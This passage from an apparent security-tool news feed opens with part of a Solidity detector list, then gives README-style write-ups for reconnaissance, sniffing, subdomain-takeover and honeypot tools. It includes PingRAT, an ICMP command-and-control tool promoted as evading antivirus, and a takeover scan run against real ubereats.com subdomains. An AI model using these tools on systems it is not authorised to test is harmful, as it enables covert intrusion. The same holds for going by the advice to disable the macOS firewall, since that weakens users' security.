    65 reentrancy-events Reentrancy vulnerabilities leading to out-of-order Events Low Medium
    66 return-bomb A low level callee may consume all callers gas unexpectedly. Low Medium
    67 timestamp Dangerous usage of block.timestamp Low Medium
    68 assembly Assembly usage Informational High
    69 assert-state-change Assert state change Informational High
    70 boolean-equal Comparison to boolean constant Informational High
    71 cyclomatic-complexity Detects functions with high (> 11) cyclomatic complexity Informational High
    72 deprecated-standards Deprecated Solidity Standards Informational High
    73 erc20-indexed Un-indexed ERC20 event parameters Informational High
    74 function-init-state Function initializing state variables Informational High
    75 incorrect-using-for Detects using-for statement usage when no function from a given library matches a given type Informational High
    76 low-level-calls Low level calls Informational High
    77 missing-inheritance Missing inheritance Informational High
    78 naming-convention Conformity to Solidity naming conventions Informational High
    79 pragma If different pragma directives are used Informational High
    80 redundant-statements Redundant statements Informational High
    81 solc-version Incorrect Solidity version Informational High
    82 unimplemented-functions Unimplemented functions Informational High
    83 unused-import Detects unused imports Informational High
    84 unused-state Unused state variables Informational High
    85 costly-loop Costly operations in a loop Informational Medium
    86 dead-code Functions that are not used Informational Medium
    87 reentrancy-unlimited-gas Reentrancy vulnerabilities through send and transfer Informational Medium
    88 similar-names Variable names are too similar Informational Medium
    89 too-many-digits Conformance to numeric notation best practices Informational Medium
    90 cache-array-length Detects for loops that use length member of some storage array in their loop condition and don't modify it. Optimization High
    91 constable-states State variables that could be declared constant Optimization High
    92 external-function Public function that could be declared external Optimization High
    93 immutable-states State variables that could be declared immutable Optimization High
    94 var-read-using-this Contract reads its own variable using this Optimization High


    Domainim - A Fast And Comprehensive Tool For Organizational Network Scanning

    By: Zion3R


    Domainim is a fast domain reconnaissance tool for organizational network scanning. The tool aims to provide a brief overview of an organization's structure using techniques like OSINT, bruteforcing, DNS resolving etc.


    Features

    Current features (v1.0.1)- - Subdomain enumeration (2 engines + bruteforcing) - User-friendly output - Resolving A records (IPv4)

    A fast and comprehensive tool for organizational network scanning (6)

    A fast and comprehensive tool for organizational network scanning (7)

    • Virtual hostname enumeration
    • Reverse DNS lookup

    A fast and comprehensive tool for organizational network scanning (8)

    • Detects wildcard subdomains (for bruteforcing)

    A fast and comprehensive tool for organizational network scanning (9)

    • Basic TCP port scanning
    • Subdomains are accepted as input

    A fast and comprehensive tool for organizational network scanning (10)

    • Export results to JSON file

    A fast and comprehensive tool for organizational network scanning (11)

    A few features are work in progress. See Planned features for more details.

    The project is inspired by Sublist3r. The port scanner module is heavily based on NimScan.

    Installation

    You can build this repo from source- - Clone the repository

    git clone git@github.com:pptx704/domainim
    • Build the binary
    nimble build
    • Run the binary
    ./domainim <domain> [--ports=<ports>]

    Or, you can just download the binary from the release page. Keep in mind that the binary is tested on Debian based systems only.

    Usage

    ./domainim <domain> [--ports=<ports> | -p:<ports>] [--wordlist=<filename> | l:<filename> [--rps=<int> | -r:<int>]] [--dns=<dns> | -d:<dns>] [--out=<filename> | -o:<filename>]
    • <domain> is the domain to be enumerated. It can be a subdomain as well.
    • -- ports | -p is a string speicification of the ports to be scanned. It can be one of the following-
    • all - Scan all ports (1-65535)
    • none - Skip port scanning (default)
    • t<n> - Scan top n ports (same as nmap). i.e. t100 scans top 100 ports. Max value is 5000. If n is greater than 5000, it will be set to 5000.
    • single value - Scan a single port. i.e. 80 scans port 80
    • range value - Scan a range of ports. i.e. 80-100 scans ports 80 to 100
    • comma separated values - Scan multiple ports. i.e. 80,443,8080 scans ports 80, 443 and 8080
    • combination - Scan a combination of the above. i.e. 80,443,8080-8090,t500 scans ports 80, 443, 8080 to 8090 and top 500 ports
    • --dns | -d is the address of the dns server. This should be a valid IPv4 address and can optionally contain the port number-
    • a.b.c.d - Use DNS server at a.b.c.d on port 53
    • a.b.c.d#n - Use DNS server at a.b.c.d on port e
    • --wordlist | -l - Path to the wordlist file. This is used for bruteforcing subdomains. If the file is invalid, bruteforcing will be skipped. You can get a wordlist from SecLists. A wordlist is also provided in the release page.
    • --rps | -r - Number of requests to be made per second during bruteforce. The default value is 1024 req/s. It is to be noted that, DNS queries are made in batches and next batch is made only after the previous one is completed. Since quries can be rate limited, increasing the value does not always guarantee faster results.
    • --out | -o - Path to the output file. The output will be saved in JSON format. The filename must end with .json.

    Examples - ./domainim nmap.org --ports=all - ./domainim google.com --ports=none --dns=8.8.8.8#53 - ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --rps=1500 - ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --outfile=results.json - ./domainim mysite.com --ports=t50,5432,7000-9000 --dns=1.1.1.1

    The help menu can be accessed using ./domainim --help or ./domainim -h.

    Usage:
    domainim <domain> [--ports=<ports> | -p:<ports>] [--wordlist=<filename> | l:<filename> [--rps=<int> | -r:<int>]] [--dns=<dns> | -d:<dns>] [--out=<filename> | -o:<filename>]
    domainim (-h | --help)

    Options:
    -h, --help Show this screen.
    -p, --ports Ports to scan. [default: `none`]
    Can be `all`, `none`, `t<n>`, single value, range value, combination
    -l, --wordlist Wordlist for subdomain bruteforcing. Bruteforcing is skipped for invalid file.
    -d, --dns IP and Port for DNS Resolver. Should be a valid IPv4 with an optional port [default: system default]
    -r, --rps DNS queries to be made per second [default: 1024 req/s]
    -o, --out JSON file where the output will be saved. Filename must end with `.json`

    Examples:
    domainim domainim.com -p:t500 -l:wordlist.txt --dns:1.1.1.1#53 --out=results.json
    domainim sub.domainim.com --ports=all --dns:8.8.8.8 -t:1500 -o:results.json

    The JSON schema for the results is as follows-

    [
    {
    "subdomain": string,
    "data": [
    "ipv4": string,
    "vhosts": [string],
    "reverse_dns": string,
    "ports": [int]
    ]
    }
    ]

    Example json for nmap.org can be found here.

    Contributing

    Contributions are welcome. Feel free to open a pull request or an issue.

    Planned Features

    • [x] TCP port scanning
    • [ ] UDP port scanning support
    • [ ] Resolve AAAA records (IPv6)
    • [x] Custom DNS server
    • [x] Add bruteforcing subdomains using a wordlist
    • [ ] Force bruteforcing (even if wildcard subdomain is found)
    • [ ] Add more engines for subdomain enumeration
    • [x] File output (JSON)
    • [ ] Multiple domain enumeration
    • [ ] Dir and File busting

    Others

    • [x] Update verbose output when encountering errors (v0.2.0)
    • [x] Show progress bar for longer operations
    • [ ] Add individual port scan progress bar
    • [ ] Add tests
    • [ ] Add comments and docstrings

    Additional Notes

    This project is still in its early stages. There are several limitations I am aware of.

    The two engines I am using (I'm calling them engine because Sublist3r does so) currently have some sort of response limit. dnsdumpster.com">dnsdumpster can fetch upto 100 subdomains. crt.sh also randomizes the results in case of too many results. Another issue with crt.sh is the fact that it returns some SQL error sometimes. So for some domain, results can be different for different runs. I am planning to add more engines in the future (at least a brute force engine).

    The port scanner has only ping response time + 750ms timeout. This might lead to false negatives. Since, domainim is not meant for port scanning but to provide a quick overview, such cases are acceptable. However, I am planning to add a flag to increase the timeout. For the same reason, filtered ports are not shown. For more comprehensive port scanning, I recommend using Nmap. Domainim also doesn't bypass rate limiting (if there is any).

    It might seem that the way vhostnames are printed, it just brings repeition on the table.

    A fast and comprehensive tool for organizational network scanning (12)

    Printing as the following might've been better-

    ack.nmap.org, issues.nmap.org, nmap.org, research.nmap.org, scannme.nmap.org, svn.nmap.org, www.nmap.org
    ↳ 45.33.49.119
    ↳ Reverse DNS: ack.nmap.org.

    But previously while testing, I found cases where not all IPs are shared by same set of vhostnames. That is why I decided to keep it this way.

    A fast and comprehensive tool for organizational network scanning (13)

    DNS server might have some sort of rate limiting. That's why I added random delays (between 0-300ms) for IPv4 resolving per query. This is to not make the DNS server get all the queries at once but rather in a more natural way. For bruteforcing method, the value is between 0-1000ms by default but that can be changed using --rps | -t flag.

    One particular limitation that is bugging me is that the DNS resolver would not return all the IPs for a domain. So it is necessary to make multiple queries to get all (or most) of the IPs. But then again, it is not possible to know how many IPs are there for a domain. I still have to come up with a solution for this. Also, nim-ndns doesn't support CNAME records. So, if a domain has a CNAME record, it will not be resolved. I am waiting for a response from the author for this.

    For now, bruteforcing is skipped if a possible wildcard subdomain is found. This is because, if a domain has a wildcard subdomain, bruteforcing will resolve IPv4 for all possible subdomains. However, this will skip valid subdomains also (i.e. scanme.nmap.org will be skipped even though it's not a wildcard value). I will add a --force-brute | -fb flag later to force bruteforcing.

    Similar thing is true for VHost enumeration for subdomain inputs. Since, urls that ends with given subdomains are returned, subdomains of similar domains are not considered. For example, scannme.nmap.org will not be printed for ack.nmap.org but something.ack.nmap.org might be. I can search for all subdomains of nmap.org but that defeats the purpose of having a subdomains as an input.

    License

    MIT License. See LICENSE for full text.



    Above - Invisible Network Protocol Sniffer

    By: Zion3R


    Invisible protocol sniffer for finding vulnerabilities in the network. Designed for pentesters and security engineers.


    Above: Invisible network protocol sniffer
    Designed for pentesters and security engineers

    Author: Magama Bazarov, <caster@exploit.org>
    Pseudonym: Caster
    Version: 2.6
    Codename: Introvert

    Disclaimer

    All information contained in this repository is provided for educational and research purposes only. The author is not responsible for any illegal use of this tool.

    It is a specialized network security tool that helps both pentesters and security professionals.

    Mechanics

    Above is a invisible network sniffer for finding vulnerabilities in network equipment. It is based entirely on network traffic analysis, so it does not make any noise on the air. He's invisible. Completely based on the Scapy library.

    Above allows pentesters to automate the process of finding vulnerabilities in network hardware. Discovery protocols, dynamic routing, 802.1Q, ICS Protocols, FHRP, STP, LLMNR/NBT-NS, etc.

    Supported protocols

    Detects up to 27 protocols:

    MACSec (802.1X AE)
    EAPOL (Checking 802.1X versions)
    ARP (Passive ARP, Host Discovery)
    CDP (Cisco Discovery Protocol)
    DTP (Dynamic Trunking Protocol)
    LLDP (Link Layer Discovery Protocol)
    802.1Q Tags (VLAN)
    S7COMM (Siemens)
    OMRON
    TACACS+ (Terminal Access Controller Access Control System Plus)
    ModbusTCP
    STP (Spanning Tree Protocol)
    OSPF (Open Shortest Path First)
    EIGRP (Enhanced Interior Gateway Routing Protocol)
    BGP (Border Gateway Protocol)
    VRRP (Virtual Router Redundancy Protocol)
    HSRP (Host Standby Redundancy Protocol)
    GLBP (Gateway Load Balancing Protocol)
    IGMP (Internet Group Management Protocol)
    LLMNR (Link Local Multicast Name Resolution)
    NBT-NS (NetBIOS Name Service)
    MDNS (Multicast DNS)
    DHCP (Dynamic Host Configuration Protocol)
    DHCPv6 (Dynamic Host Configuration Protocol v6)
    ICMPv6 (Internet Control Message Protocol v6)
    SSDP (Simple Service Discovery Protocol)
    MNDP (MikroTik Neighbor Discovery Protocol)

    Operating Mechanism

    Above works in two modes:

    • Hot mode: Sniffing on your interface specifying a timer
    • Cold mode: Analyzing traffic dumps

    The tool is very simple in its operation and is driven by arguments:

    • Interface: Specifying the network interface on which sniffing will be performed
    • Timer: Time during which traffic analysis will be performed
    • Input: The tool takes an already prepared .pcap as input and looks for protocols in it
    • Output: Above will record the listened traffic to .pcap file, its name you specify yourself
    • Passive ARP: Detecting hosts in a segment using Passive ARP
    usage: above.py [-h] [--interface INTERFACE] [--timer TIMER] [--output OUTPUT] [--input INPUT] [--passive-arp]

    options:
    -h, --help show this help message and exit
    --interface INTERFACE
    Interface for traffic listening
    --timer TIMER Time in seconds to capture packets, if not set capture runs indefinitely
    --output OUTPUT File name where the traffic will be recorded
    --input INPUT File name of the traffic dump
    --passive-arp Passive ARP (Host Discovery)

    Information about protocols

    The information obtained will be useful not only to the pentester, but also to the security engineer, he will know what he needs to pay attention to.

    When Above detects a protocol, it outputs the necessary information to indicate the attack vector or security issue:

    • Impact: What kind of attack can be performed on this protocol;

    • Tools: What tool can be used to launch an attack;

    • Technical information: Required information for the pentester, sender MAC/IP addresses, FHRP group IDs, OSPF/EIGRP domains, etc.

    • Mitigation: Recommendations for fixing the security problems

    • Source/Destination Addresses: For protocols, Above displays information about the source and destination MAC addresses and IP addresses


    Installation

    Linux

    You can install Above directly from the Kali Linux repositories

    caster@kali:~$ sudo apt update && sudo apt install above

    Or...

    caster@kali:~$ sudo apt-get install python3-scapy python3-colorama python3-setuptools
    caster@kali:~$ git clone https://github.com/casterbyte/Above
    caster@kali:~$ cd Above/
    caster@kali:~/Above$ sudo python3 setup.py install

    macOS:

    # Install python3 first
    brew install python3
    # Then install required dependencies
    sudo pip3 install scapy colorama setuptools

    # Clone the repo
    git clone https://github.com/casterbyte/Above
    cd Above/
    sudo python3 setup.py install

    Don't forget to deactivate your firewall on macOS!

    Settings > Network > Firewall


    How to Use

    Hot mode

    Above requires root access for sniffing

    Above can be run with or without a timer:

    caster@kali:~$ sudo above --interface eth0 --timer 120

    To stop traffic sniffing, press CTRL + Π‘

    WARNING! Above is not designed to work with tunnel interfaces (L3) due to the use of filters for L2 protocols. Tool on tunneled L3 interfaces may not work properly.

    Example:

    caster@kali:~$ sudo above --interface eth0 --timer 120

    -----------------------------------------------------------------------------------------
    [+] Start sniffing...

    [*] After the protocol is detected - all necessary information about it will be displayed
    --------------------------------------------------
    [+] Detected SSDP Packet
    [*] Attack Impact: Potential for UPnP Device Exploitation
    [*] Tools: evil-ssdp
    [*] SSDP Source IP: 192.168.0.251
    [*] SSDP Source MAC: 02:10:de:64:f2:34
    [*] Mitigation: Ensure UPnP is disabled on all devices unless absolutely necessary, monitor UPnP traffic
    --------------------------------------------------
    [+] Detected MDNS Packet
    [*] Attack Impact: MDNS Spoofing, Credentials Interception
    [*] Tools: Responder
    [*] MDNS Spoofing works specifically against Windows machines
    [*] You cannot get NetNTLMv2-SSP from Apple devices
    [*] MDNS Speaker IP: fe80::183f:301c:27bd:543
    [*] MDNS Speaker MAC: 02:10:de:64:f2:34
    [*] Mitigation: Filter MDNS traffic. Be careful with MDNS filtering
    --------------------------------------------------

    If you need to record the sniffed traffic, use the --output argument

    caster@kali:~$ sudo above --interface eth0 --timer 120 --output above.pcap

    If you interrupt the tool with CTRL+C, the traffic is still written to the file

    Cold mode

    If you already have some recorded traffic, you can use the --input argument to look for potential security issues

    caster@kali:~$ above --input ospf-md5.cap

    Example:

    caster@kali:~$ sudo above --input ospf-md5.cap

    [+] Analyzing pcap file...

    --------------------------------------------------
    [+] Detected OSPF Packet
    [+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
    [*] Tools: Loki, Scapy, FRRouting
    [*] OSPF Area ID: 0.0.0.0
    [*] OSPF Neighbor IP: 10.0.0.1
    [*] OSPF Neighbor MAC: 00:0c:29:dd:4c:54
    [!] Authentication: MD5
    [*] Tools for bruteforce: Ettercap, John the Ripper
    [*] OSPF Key ID: 1
    [*] Mitigation: Enable passive interfaces, use authentication
    --------------------------------------------------
    [+] Detected OSPF Packet
    [+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
    [*] Tools: Loki, Scapy, FRRouting
    [*] OSPF Area ID: 0.0.0.0
    [*] OSPF Neighbor IP: 192.168.0.2
    [*] OSPF Neighbor MAC: 00:0c:29:43:7b:fb
    [!] Authentication: MD5
    [*] Tools for bruteforce: Ettercap, John the Ripper
    [*] OSPF Key ID: 1
    [*] Mitigation: Enable passive interfaces, use authentication

    Passive ARP

    The tool can detect hosts without noise in the air by processing ARP frames in passive mode

    caster@kali:~$ sudo above --interface eth0 --passive-arp --timer 10

    [+] Host discovery using Passive ARP

    --------------------------------------------------
    [+] Detected ARP Reply
    [*] ARP Reply for IP: 192.168.1.88
    [*] MAC Address: 00:00:0c:07:ac:c8
    --------------------------------------------------
    [+] Detected ARP Reply
    [*] ARP Reply for IP: 192.168.1.40
    [*] MAC Address: 00:0c:29:c5:82:81
    --------------------------------------------------

    Outro

    I wrote this tool because of the track "A View From Above (Remix)" by KOAN Sound. This track was everything to me when I was working on this sniffer.




    Subhunter - A Fast Subdomain Takeover Tool

    By: Zion3R


    Subdomain takeover is a common vulnerability that allows an attacker to gain control over a subdomain of a target domain and redirect users intended for an organization's domain to a website that performs malicious activities, such as phishing campaigns, stealing user cookies, etc. It occurs when an attacker gains control over a subdomain of a target domain. Typically, this happens when the subdomain has a CNAME in the DNS, but no host is providing content for it. Subhunter takes a given list of Subdomains" title="Subdomains">subdomains and scans them to check this vulnerability.


    Features:

    • Auto update
    • Uses random user agents
    • Built in Go
    • Uses a fork of fingerprint data from well known sources (can-i-take-over-xyz)

    Installation:

    Option 1:

    Download from releases

    Option 2:

    Build from source:

    $ git clone https://github.com/Nemesis0U/Subhunter.git
    $ go build subhunter.go

    Usage:

    Options:

    Usage of subhunter:
    -l string
    File including a list of hosts to scan
    -o string
    File to save results
    -t int
    Number of threads for scanning (default 50)
    -timeout int
    Timeout in seconds (default 20)

    Demo (Added fake fingerprint for POC):

    ./Subhunter -l subdomains.txt -o test.txt

    ____ _ _ _
    / ___| _ _ | |__ | |__ _ _ _ __ | |_ ___ _ __
    \___ \ | | | | | '_ \ | '_ \ | | | | | '_ \ | __| / _ \ | '__|
    ___) | | |_| | | |_) | | | | | | |_| | | | | | | |_ | __/ | |
    |____/ \__,_| |_.__/ |_| |_| \__,_| |_| |_| \__| \___| |_|


    A fast subdomain takeover tool

    Created by Nemesis

    Loaded 88 fingerprints for current scan

    -----------------------------------------------------------------------------

    [+] Nothing found at www.ubereats.com: Not Vulnerable
    [+] Nothing found at testauth.ubereats.com: Not Vulnerable
    [+] Nothing found at apple-maps-app-clip.ubereats.com: Not Vulnerable
    [+] Nothing found at about.ubereats.com: Not Vulnerable
    [+] Nothing found at beta.ubereats.com: Not Vulnerable
    [+] Nothing found at ewp.ubereats.com: Not Vulnerable
    [+] Nothi ng found at edgetest.ubereats.com: Not Vulnerable
    [+] Nothing found at guest.ubereats.com: Not Vulnerable
    [+] Google Cloud: Possible takeover found at testauth.ubereats.com: Vulnerable
    [+] Nothing found at info.ubereats.com: Not Vulnerable
    [+] Nothing found at learn.ubereats.com: Not Vulnerable
    [+] Nothing found at merchants.ubereats.com: Not Vulnerable
    [+] Nothing found at guest-beta.ubereats.com: Not Vulnerable
    [+] Nothing found at merchant-help.ubereats.com: Not Vulnerable
    [+] Nothing found at merchants-beta.ubereats.com: Not Vulnerable
    [+] Nothing found at merchants-staging.ubereats.com: Not Vulnerable
    [+] Nothing found at messages.ubereats.com: Not Vulnerable
    [+] Nothing found at order.ubereats.com: Not Vulnerable
    [+] Nothing found at restaurants.ubereats.com: Not Vulnerable
    [+] Nothing found at payments.ubereats.com: Not Vulnerable
    [+] Nothing found at static.ubereats.com: Not Vulnerable

    Subhunter exiting...
    Results written to test.txt




    PingRAT - Secretly Passes C2 Traffic Through Firewalls Using ICMP Payloads

    By: Zion3R


    PingRAT secretly passes C2 traffic through firewalls using ICMP payloads.

    Features:

    • Uses ICMP for Command and Control
    • Undetectable by most AV/EDR solutions
    • Written in Go

    Installation:

    Download the binaries

    or build the binaries and you are ready to go:

    $ git clone https://github.com/Nemesis0U/PingRAT.git
    $ go build client.go
    $ go build server.go

    Usage:

    Server:

    ./server -h
    Usage of ./server:
    -d string
    Destination IP address
    -i string
    Listener (virtual) Network Interface (e.g. eth0)

    Client:

    ./client -h
    Usage of ./client:
    -d string
    Destination IP address
    -i string
    (Virtual) Network Interface (e.g., eth0)



    Galah - An LLM-powered Web Honeypot Using The OpenAI API

    By: Zion3R


    TL;DR: Galah (/Ι‘Ι™Λˆlɑː/ - pronounced 'guh-laa') is an LLM (Large Language Model) powered web honeypot, currently compatible with the OpenAI API, that is able to mimic various applications and dynamically respond to arbitrary HTTP requests.


    Description

    Named after the clever Australian parrot known for its mimicry, Galah mirrors this trait in its functionality. Unlike traditional web honeypots that rely on a manual and limiting method of emulating numerous web applications or vulnerabilities, Galah adopts a novel approach. This LLM-powered honeypot mimics various web applications by dynamically crafting relevant (and occasionally foolish) responses, including HTTP headers and body content, to arbitrary HTTP requests. Fun fact: in Aussie English, Galah also means fool!

    I've deployed a cache for the LLM-generated responses (the cache duration can be customized in the config file) to avoid generating multiple responses for the same request and to reduce the cost of the OpenAI API. The cache stores responses per port, meaning if you probe a specific port of the honeypot, the generated response won't be returned for the same request on a different port.

    The prompt is the most crucial part of this honeypot! You can update the prompt in the config file, but be sure not to change the part that instructs the LLM to generate the response in the specified JSON format.

    Note: Galah was a fun weekend project I created to evaluate the capabilities of LLMs in generating HTTP messages, and it is not intended for production use. The honeypot may be fingerprinted based on its response time, non-standard, or sometimes weird responses, and other network-based techniques. Use this tool at your own risk, and be sure to set usage limits for your OpenAI API.

    Future Enhancements

    • Rule-Based Response: The new version of Galah will employ a dynamic, rule-based approach, adding more control over response generation. This will further reduce OpenAI API costs and increase the accuracy of the generated responses.

    • Response Database: It will enable you to generate and import a response database. This ensures the honeypot only turns to the OpenAI API for unknown or new requests. I'm also working on cleaning up and sharing my own database.

    • Support for Other LLMs.

    Getting Started

    • Ensure you have Go version 1.20+ installed.
    • Create an OpenAI API key from here.
    • If you want to serve over HTTPS, generate TLS certificates.
    • Clone the repo and install the dependencies.
    • Update the config.yaml file.
    • Build and run the Go binary!
    % git clone git@github.com:0x4D31/galah.git
    % cd galah
    % go mod download
    % go build
    % ./galah -i en0 -v

    β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
    β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
    β–ˆβ–ˆ β–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ
    β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
    β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
    llm-based web honeypot // version 1.0
    author: Adel "0x4D31" Karimi

    2024/01/01 04:29:10 Starting HTTP server on port 8080
    2024/01/01 04:29:10 Starting HTTP server on port 8888
    2024/01/01 04:29:10 Starting HTTPS server on port 8443 with TLS profile: profile1_selfsigned
    2024/01/01 04:29:10 Starting HTTPS server on port 443 with TLS profile: profile1_selfsigned

    2024/01/01 04:35:57 Received a request for "/.git/config" from [::1]:65434
    2024/01/01 04:35:57 Request cache miss for "/.git/config": Not found in cache
    2024/01/01 04:35:59 Generated HTTP response: {"Headers": {"Content-Type": "text/plain", "Server": "Apache/2.4.41 (Ubuntu)", "Status": "403 Forbidden"}, "Body": "Forbidden\nYou don't have permission to access this resource."}
    2024/01/01 04:35:59 Sending the crafted response to [::1]:65434

    ^C2024/01/01 04:39:27 Received shutdown signal. Shutting down servers...
    2024/01/01 04:39:27 All servers shut down gracefully.

    Example Responses

    Here are some example responses:

    Example 1

    % curl http://localhost:8080/login.php
    <!DOCTYPE html><html><head><title>Login Page</title></head><body><form action='/submit.php' method='post'><label for='uname'><b>Username:</b></label><br><input type='text' placeholder='Enter Username' name='uname' required><br><label for='psw'><b>Password:</b></label><br><input type='password' placeholder='Enter Password' name='psw' required><br><button type='submit'>Login</button></form></body></html>

    JSON log record:

    {"timestamp":"2024-01-01T05:38:08.854878","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"51978","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/login.php","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Content-Type":"text/html","Server":"Apache/2.4.38"},"body":"\u003c!DOCTYPE html\u003e\u003chtml\u003e\u003chead\u003e\u003ctitle\u003eLogin Page\u003c/title\u003e\u003c/head\u003e\u003cbody\u003e\u003cform action='/submit.php' method='post'\u003e\u003clabel for='uname'\u003e\u003cb\u003eUsername:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='text' placeholder='Enter Username' name='uname' required\u003e\u003cbr\u003e\u003clabel for='psw'\u003e\u003cb\u003ePassword:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='password' placeholder='Enter Password' name='psw' required\u003e\u003cbr\u003e\u003cbutton type='submit'\u003eLogin\u003c/button\u003e\u003c/form\u003e\u003c/body\u003e\u003c/html\u003e"}}

    Example 2

    % curl http://localhost:8080/.aws/credentials
    [default]
    aws_access_key_id = AKIAIOSFODNN7EXAMPLE
    aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
    region = us-west-2

    JSON log record:

    {"timestamp":"2024-01-01T05:40:34.167361","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"65311","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/.aws/credentials","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Encoding":"gzip","Content-Length":"126","Content-Type":"text/plain","Server":"Apache/2.4.51 (Unix)"},"body":"[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\naws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\nregion = us-west-2"}}

    Okay, that was impressive!

    Example 3

    Now, let's do some sort of adversarial testing!

    % curl http://localhost:8888/are-you-a-honeypot
    No, I am a server.`

    JSON log record:

    {"timestamp":"2024-01-01T05:50:43.792479","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"61982","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/are-you-a-honeypot","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Length":"20","Content-Type":"text/plain","Server":"Apache/2.4.41 (Ubuntu)"},"body":"No, I am a server."}}

    πŸ˜‘

    % curl http://localhost:8888/i-mean-are-you-a-fake-server`
    No, I am not a fake server.

    JSON log record:

    {"timestamp":"2024-01-01T05:51:40.812831","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"62205","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/i-mean-are-you-a-fake-server","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Type":"text/plain","Server":"LocalHost/1.0"},"body":"No, I am not a fake server."}}

    You're a galah, mate!



    Url-Status-Checker - Tool For Swiftly Checking The Status Of URLs

    By: Zion3R



    Status Checker is a Python script that checks the status of one or multiple URLs/domains and categorizes them based on their HTTP status codes. Version 1.0.0 Created BY BLACK-SCORP10 t.me/BLACK-SCORP10

    Features

    • Check the status of single or multiple URLs/domains.
    • Asynchronous HTTP requests for improved performance.
    • Color-coded output for better visualization of status codes.
    • Progress bar when checking multiple URLs.
    • Save results to an output file.
    • Error handling for inaccessible URLs and invalid responses.
    • Command-line interface for easy usage.

    Installation

    1. Clone the repository:

    bash git clone https://github.com/your_username/status-checker.git cd status-checker

    1. Install dependencies:

    bash pip install -r requirements.txt

    Usage

    python status_checker.py [-h] [-d DOMAIN] [-l LIST] [-o OUTPUT] [-v] [-update]
    • -d, --domain: Single domain/URL to check.
    • -l, --list: File containing a list of domains/URLs to check.
    • -o, --output: File to save the output.
    • -v, --version: Display version information.
    • -update: Update the tool.

    Example:

    python status_checker.py -l urls.txt -o results.txt

    Preview:

    License

    This project is licensed under the MIT License - see the LICENSE file for details.



    Noia - Simple Mobile Applications Sandbox File Browser Tool

    By: Zion3R


    Noia is a web-based tool whose main aim is to ease the process of browsing mobile applications sandbox and directly previewing SQLite databases, images, and more. Powered by frida.re.

    Please note that I'm not a programmer, but I'm probably above the median in code-savyness. Try it out, open an issue if you find any problems. PRs are welcome.


    Installation & Usage

    npm install -g noia
    noia

    Features

    • Explore third-party applications files and directories. Noia shows you details including the access permissions, file type and much more.

    • View custom binary files. Directly preview SQLite databases, images, and more.

    • Search application by name.

    • Search files and directories by name.

    • Navigate to a custom directory using the ctrl+g shortcut.

    • Download the application files and directories for further analysis.

    • Basic iOS support

    and more


    Setup

    Desktop requirements:

    • node.js LTS and npm
    • Any decent modern desktop browser

    Noia is available on npm, so just type the following command to install it and run it:

    npm install -g noia
    noia

    Device setup:

    Noia is powered by frida.re, thus requires Frida to run.

    Rooted Device

    See: * https://frida.re/docs/android/ * https://frida.re/docs/ios/

    Non-rooted Device

